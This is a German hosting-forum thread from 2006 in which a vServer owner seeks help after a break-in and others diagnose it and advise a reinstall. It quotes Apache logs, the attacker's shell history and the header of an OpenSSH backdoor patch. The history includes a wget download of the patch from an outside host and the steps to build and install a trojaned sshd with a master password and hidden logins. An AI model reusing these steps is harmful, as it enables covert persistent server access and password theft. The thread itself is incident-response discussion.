vServer von S4Y gehackt (FTP)

[telegratis]

Hallo,

wir haben ein Problem in der Nacht vom 07.08 - 08.08 hat jemand auf unseren Server über Confixx zugegriffen und eine Seite per Confixx Webftp hochgeladen.

Unsere Frage ist jetzt wie kommt er darein? ist doch mit Benutzernamen und Passwort (7stellen) gesichert.

Hier könnt Ihr den Anfang access_log vom Apache sehen. Vielleicht habt ihr nen Tip wie wir unser Sicherheitsloch schliessen können.

<-- Hackangriff Start --> 

213.93.125.2 - - [07/Aug/2006:22:37:22 +0200] "GET / HTTP/1.0" 302 - "-" "-"
213.219.122.11 - - [07/Aug/2006:22:47:06 +0200] "HEAD / HTTP/1.0" 302 - "-" "Sprint (safemode.org)"
86.127.129.127 - - [07/Aug/2006:23:46:39 +0200] "GET / HTTP/1.0" 302 - "-" "-"
208.245.49.6 - - [08/Aug/2006:00:33:06 +0200] "HEAD / HTTP/1.0" 302 - "-" "-"
213.92.92.22 - - [08/Aug/2006:01:29:40 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 330 "-" "-"
219.240.12.173 - - [08/Aug/2006:01:37:24 +0200] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
219.240.12.173 - - [08/Aug/2006:01:37:24 +0200] "GET /user/allgemein_start.php HTTP/1.1" 401 929 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"

Fortsetzung unter:
access_log_hacker.txt

Für jede mithilfe sind wir sehr dankbar.

 

[charli]

Hallo,

grundsätzlich: Neuinstallation des Servers, Confixx-Update, alles andere ebenfalls aktuell halten.

Du bist scheinbar bei s4y und hast deren Spezial-Confixx.

web142044204

So viele User hast Du bestimmt nicht (kann Confixx das überhaupt?), probiere doch mal selbst ob man mit diesem Usernamen möglicherweise ohne Passwort reinkommt. Nachsehen ob es einen Systemuser mit diesem Usernamen gibt (/etc/passwd) und ob es einen Confixx-User mit diesem Usernamen gibt (Mysql-Dump). Kann natürlich sein, daß Dein Server schon früher gehackt wurde und dabei dieser Account für spätere Verwendung angelegt.

 

[telegratis]

der Benutzername (web142044204 ) ist ein als Bespiel angegeben und aus Sicherheitsgründen geändert, den richtigen "web" Benutzer gibt es natürlich.
Denkt euch einfach statt web142044204 einen einfachen webuser aus.
Ohne passwort kommt man nicht in das system ich glaub es nennt sich htaccess, schaut so aus:

MOD: Bilder immer als Anhang!

Der fall ist sehr heikel da die Kriminalpolizei gegen die "Hacker" wegen Wirtschaftskriminalität und Internetkriminalität ermittelt.

Leider haben wir mit diesen Servergeschichten nicht so viel ahnung und bitten daher um die mithilfe von diesem Board.

 

[marneus]

Sorry, aber das fasse ich alles überhaupt nicht!

Es scheinen auf dem Rechner sensible Daten zu liegen und ihr "sichert" Euch mit htaccess?! www.hire-a-professional.com... Geiz ist nicht geil!

 

[charli]

Hallo,

der Benutzername (web142044204 ) ist ein als Bespiel angegeben und aus Sicherheitsgründen geändert, den richtigen "web" Benutzer gibt es natürlich.

Bitte gleich dazuschreiben, lenkt sonst in die falsche Richtung.

Der fall ist sehr heikel da die Kriminalpolizei gegen die "Hacker" wegen Wirtschaftskriminalität und Internetkriminalität ermittelt.

Weil ihr Strafantrag gestellt habt?

Leider haben wir mit diesen Servergeschichten nicht so viel ahnung und bitten daher um die mithilfe von diesem Board.

Sorry, falsche Adresse. Wenn die Kripo ermittelt dann braucht sie den Server vermutlich in unverändertem Zustand, insbesondere solltet ihr jede Aktivität mit der Polizei abstimmen.

Was nach Abschluß er Ermittlung bzw ausreichender Beweissicherung zu tun ist hatte ich schon als allererstes geschrieben.

Falls die IP nicht auch von Dir verändert wurde handelt es sich um einen offenen Proxy ( Category:Open proxies blocked on Wikipedia - Wikipedia, the free encyclopedia ) der irgendwo im Ausland steht, man hat (ohne Zugriff auf die Logs dieses Proxys) keine Möglichkeit herauszufinden wo der Hacker tatsächlich sitzt.

Das Passwort könnte in falsche Hände geraten sein, z.B. Trojaner auf dem PC, oder in den Server wurde über ein unsicheres Script eingedrungen, das ist die häufigste erfolgreiche Hackerattacke. Laufen große, bekannte PHP-Pakete auf dem Server?

Ich kenne das s4y-Premium-Confixx nicht, ist bei der Version Login über .htaccess üblich? .htaccess scheint auf den ersten Blick sicher zu sein, ist es aber nicht.

 

[Steffen]

Weshalb ist .htaccess als unsicher anzusehen?

 

[charli]

Hallo,

es schützt gegen Zugriff direkt über den Apachen aber nicht gegen Zugriff über ein Script das auf dem Server läuft oder eingeschleust wird.

 

[telegratis]

Hallo,

danke vorab für die mithilfe.

Folgendes wurde nun von der Kripo ermittelt, die Hacker sind über eine defektes PHP-Datei (die noch nicht fertig war) eingedrungen und haben dort neue PHP-Scripte installiert die Passwörter uvm. ausgelesen haben, der Rest war ein kinderspiel da die Passwörter im PHP-Script aufgezeigt waren. Unser Server wurde nun von der Kripo gesichert und ist nun wieder für uns zugänglich. Die ermittlungen sind nicht zu ende da die Hacker-Gruppe auch ohne Proxy zugegriffen hat. Somit ist der Standort bekannt.

Folgendes hat uns s4y übermittelt, vielleicht kann uns das jemand auf deutsch erklären:

----- history -----
cd perkakas
wget http://sec.angrypacket.com/code/ssh0wn.diff
wget http://openbsd.md5.com.ar/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
ls -alF
telnet 22
tar xzf openssh-3.4p1.tar.gz
ssh -l localhost
ssh -l root localhost
ls -alF
telnet localhost 22
ls -alF
cd openssh-3.4p1/
cd ..
mv ssh0wn.diff openssh-3.4p1
cd openssh-3.4p1/
patch < ssh0wn.diff
vi version.h
vi includes.h
vi auth-passwd.c
./configure --prefix=/usr --sysconfdir=/etc/ssh
make
vi auth-passwd.c
./configure --prefix=/usr --sysconfdir=/etc/ssh
make
vi auth-passwd.c
cat /etc/passwd
passwd r00t
./configure --prefix=/usr --sysconfdir=/etc/ssh
make
make install
make clean && make distclean
echo "UsePrivilegeSeparation no" >> sshd_config
cp -f sshd_config /etc/ssh/sshd_config
mkdir /dev/hdal
chmod 777 /dev/hdal
cat /var/run/sshd.pid
-----

----- ein Auszug aus http://sec.angrypacket.com/code/ssh0wn.diff -----
# $Id: ssh0wn.diff,v 1.6 2002/08/08 21:53:02 enz00 Exp $
#
# patch for openssh-3.4p1
#
# when applied this patch will authenticate you 
# as any user with the secret password and that user
# will not be logged. it will also log logins/passwords
# client and server side
#
# usage:
# you'll probably want to change the defines found below
# make sure that the _LOG_DIR is chmod 777
# cp ssh0wn.diff openssh-3.4p1/;cd openssh-3.4p1
# patch < ssh0wn.diff
#
# enz00@angrypacket.com
# sec.angrypacket.com
-----

jetzt heisst es für uns, Server Neuinstallieren

 

[Sinepp]

Ja und was mir schon geraten wurde möchte ich euch nicht vorenthalten: Lesen, lernen, absichern. Das klingt jetzt fies, aber ihr MÜSST euch mit dem Thema auseinandersetzen. Wenn Auseinandersetzen bedeutet, dass ihr in ein Buch investieren müsst, gut, wenn es heisst dass ihr einen externen einkaufen müsst, auch gut. Nur tut etwas, das ist ja nicht zum anschauen.

 

[charli]

Hallo,

eine defektes PHP-Datei (die noch nicht fertig war) eingedrungen

gelobt habt ihr euch für diese Meisterleistung sicher schon selbst.

Die ermittlungen sind nicht zu ende da die Hacker-Gruppe auch ohne Proxy zugegriffen hat.

Das ist erfreulich. Hoffentlich ist der Standort in D oder zumindest EU.

vielleicht kann uns das jemand auf deutsch erklären

OpenSSH (das Programm für den Zugang über Putty) wurde gepatcht und neu compiliert. Die gepatchte Version erlaubt Anmeldung mit jedem beliebigen Usernamen (root ist natürlich besonders interessant) wenn man das in den Patch eingebaute Spezialpasswort (das der Hacker selbst reinschreibt) kennt. Außerdem werden Logins mit diesem Spezialpasswort nicht im SSH-Log protokolliert.

Kurz und deutlich: der Hacker kann jederzeit auf den Server, auch wenn Du die Passwörter änderst und Du kannst nicht im Log feststellen wann er drin war.

Jetzt heisst es für uns, Server Neuinstallieren

Da führt leider kein Weg dran vorbei. Und den Beitrag von Sinepp ernst nehmen!

 

[telegratis]

Kurz und deutlich: der Hacker kann jederzeit auf den Server, auch wenn Du die Passwörter änderst und Du kannst nicht im Log feststellen wann er drin war.

Das ist sehr sehr heftig, können wir uns noch vor der Neuinstallation irgendwie schützen? Ports sperren oder sowas ähnliches?

Und den Beitrag von Sinepp ernst nehmen!

Den nehmen wir sehr ernst!!! Wir werden vor der Neuinstallation jemanden beauftragen die Neuinstallation durchzuführen und den Server abzusichern und zu überwachen.

Wir danken alle für die Mithilfe auf dieses Board ist halt verlass!

 

[orth-it.de]

Das ist sehr sehr heftig, können wir uns noch vor der Neuinstallation irgendwie schützen? Ports sperren oder sowas ähnliches?

Nein, könnt ihr euch eigentlich nicht. Am zuverlässigsten ist eine komplette Neuinstallation, da man nie wissen kann, was genau durch den Eindringlich modifiziert wurde.

 

[charli]

Hallo,

Das ist sehr sehr heftig, können wir uns noch vor der Neuinstallation irgendwie schützen?

Server runterfahren bzw in's Rescuesystem wechseln.

Die eingebaute Hintertür die aus dem Log entnehmbar ist kann man natürlich beseitigen (OpenSSH wieder durch das Original ersetzen) aber man muß damit rechnen, daß der Hacker weitere Hintertüren eingebaut hat.

Du hast weiter oben geschrieben:

die Hacker sind über eine defektes PHP-Datei (die noch nicht fertig war) eingedrungen und haben dort neue PHP-Scripte installiert die Passwörter uvm. ausgelesen haben, der Rest war ein kinderspiel da die Passwörter im PHP-Script aufgezeigt waren.

Wie sind die Hacker an das Root-Passwort gekommen? War /etc/shadow für normale User freigegeben oder war es identisch mit dem Passwort eines einfachen Users?

Die im Protokoll festgehaltene Installation setzt Rootrechte voraus (konkret das "make install"). "Normalerweise" erledigt man das über einen Kernel-Exploit, aber auf einem Vserver habt ihr keinen eigenen Kernel.

 

[telegratis]

So wir haben nun den Serve neu aufgespielt.

Weiter können wir sagen dass die Hintertür im USOLVED - Newsscript liegt. Wie wir nun herausfinden konnten waren nicht nur wir betroffen.

Die große Frage die wir uns immer noch stellen wie kamen diese Leute an die Root Rechte um das OpenSSH zu installieren.

Diese Frage wird wohl noch offen bleiben.

USOLVED hat nun ein neues Update herausgegeben das dieses Sicherheitsloch schließt. Wir werden allerdings diese Software nicht mehr benutzen. Generell werden wir keine freien PHP Skripte mehr benutzen.

Wir möchten uns bei allen bedanken die uns geholfen haben.

 

[Dr. Diamond]

...
Folgendes hat uns s4y übermittelt, vielleicht kann uns das jemand auf deutsch erklären:
...

Tut mir leid das so sagen zu muessen, aber wenn man den Inhalt der oben geposteten History nicht halbwegs deuten kann, sollte man keinen Server betreiben oder zumindest fachkundiges Personal fuer die Betreuung einkalkulieren.

Nebenher: Der reine Verzicht auf freie Software, ist nicht de Raetsels Loesung.

Bei allem Respekt, aber der beschriebene Fall grenzt an Fahrlaessigkeit und man sollte sich darueber bewusst sein, dass solch ein Verhalten evtl. auch Zivil- und Straffrechtlich fuer einen Selber als Betreiber des gehackten Servers konsequenzen haben kann.

So bleibt abschliessend nur zu hoffen, dass Schaden gluck macht.

 

[m0nji]

naja mit "fahrlässigkeit" übertreibt ihr jetzt!

solange man von hackangriffen befreit ist kann man gut reden!
mit sicherheit ist man für den schutz des systemes verantwortlich aber sowas kann auch passieren obwohl man nur super sichere, ultra getestete scripts im einsatz hat oder ne firewall drauf wo nur ports geöffnet werden von programmen die gerade im einsatz sind und und und.

MOD: Bitte an Boardregel Nr. 3 halten! Merci!

 

[Darkdream]

Klar kann immer was sein.

Das sicherste ist IMHO noch immer init 0 *scnr*